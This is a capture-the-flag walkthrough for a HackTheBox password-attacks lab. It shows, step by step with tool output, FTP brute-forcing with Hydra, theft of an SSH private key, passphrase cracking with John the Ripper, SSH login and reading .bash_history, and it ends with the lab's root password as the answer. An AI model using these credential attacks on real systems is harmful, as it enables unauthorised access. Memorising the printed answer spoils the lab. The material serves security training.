Password Attacks Lab - Easy
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Password Attacks
- 🔗 Link: Password Attacks Lab - Easy
❓Question¶
Examine the first target and submit the root password as the answer.
📋 Walkthrough¶
First, we perform an Nmap scan to identify open ports and services on the target machine.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 10:15 UTC
Nmap scan report for 10.129.240.178
Host is up (0.026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.76 seconds
Next, we use Hydra to perform a brute-force attack on the FTP service to find valid credentials.
└─$ hydra -L username.list ftp://$TARGET -P password.list
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-18 10:22:05
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ftp://10.129.240.178:21/
[STATUS] 256.00 tries/min, 256 tries in 00:01h, 20856 to do in 01:22h, 16 active
[STATUS] 261.33 tries/min, 784 tries in 00:03h, 20328 to do in 01:18h, 16 active
[STATUS] 267.43 tries/min, 1872 tries in 00:07h, 19240 to do in 01:12h, 16 active
[STATUS] 264.27 tries/min, 3964 tries in 00:15h, 17148 to do in 01:05h, 16 active
[STATUS] 265.42 tries/min, 8228 tries in 00:31h, 12884 to do in 00:49h, 16 active
[STATUS] 266.64 tries/min, 12532 tries in 00:47h, 8580 to do in 00:33h, 16 active
[21][ftp] host: 10.129.240.178 login: mike password: 7777777
We successfully find the FTP credentials: mike:7777777.
Using the obtained credentials, we log in to the FTP server and download the id_rsa file.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $TARGET
Connected to 10.129.240.178.
220 (vsFTPd 3.0.3)
Name (10.129.240.178:kali): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45144|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 554 Feb 09 2022 authorized_keys
-rw------- 1 1000 1000 2546 Feb 09 2022 id_rsa
-rw-r--r-- 1 1000 1000 570 Feb 09 2022 id_rsa.pub
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||53276|)
150 Opening BINARY mode data connection for id_rsa (2546 bytes).
100% |*************************************| 2546 384.99 KiB/s 00:00 ETA
226 Transfer complete.
2546 bytes received in 00:00 (78.17 KiB/s)
ftp> exit
221 Goodbye.
We then use ssh2john to convert the id_rsa file to a hash format and crack it using John the Ripper.
──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh2john id_rsa > hash
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
7777777 (id_rsa)
1g 0:00:00:00 DONE (2025-03-18 11:30) 50.00g/s 9600p/s 9600c/s 9600C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We find that the passphrase for the id_rsa file is 7777777.
Next, we use the cracked id_rsa file to log in to the target machine via SSH.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh -i id_rsa mike@$TARGET
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Mar 18 10:38:56 GMT 2025
System load: 0.0 Processes: 158
Usage of /: 31.5% of 8.79GB Users logged in: 0
Memory usage: 11% IPv4 address for ens192: 10.129.240.178
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
214 updates can be applied immediately.
165 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Feb 9 17:37:10 2022 from 10.129.202.64
mike@skills-easy:~$
Once logged in, we check the .bash_history file to find any useful information.
mike@skills-easy:~$ ls -la
total 40
drwxr-xr-x 4 mike mike 4096 Feb 10 2022 .
drwxr-xr-x 3 root root 4096 Feb 9 2022 ..
-rw------- 1 mike mike 5900 Feb 10 2022 .bash_history
-rw-r--r-- 1 mike mike 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 mike mike 3771 Feb 25 2020 .bashrc
drwx------ 2 mike mike 4096 Feb 9 2022 .cache
-rw-r--r-- 1 mike mike 807 Feb 25 2020 .profile
drwx------ 2 mike mike 4096 Feb 9 2022 .ssh
-rw------- 1 mike mike 2859 Feb 9 2022 .viminfo
mike@skills-easy:~$ cat .bash_
.bash_history .bash_logout
mike@skills-easy:~$ cat .bash_history
In the .bash_history file, we find the root password.
We use the found password to switch to the root user.
Answer
dgb6fzm0ynk@AME9pqu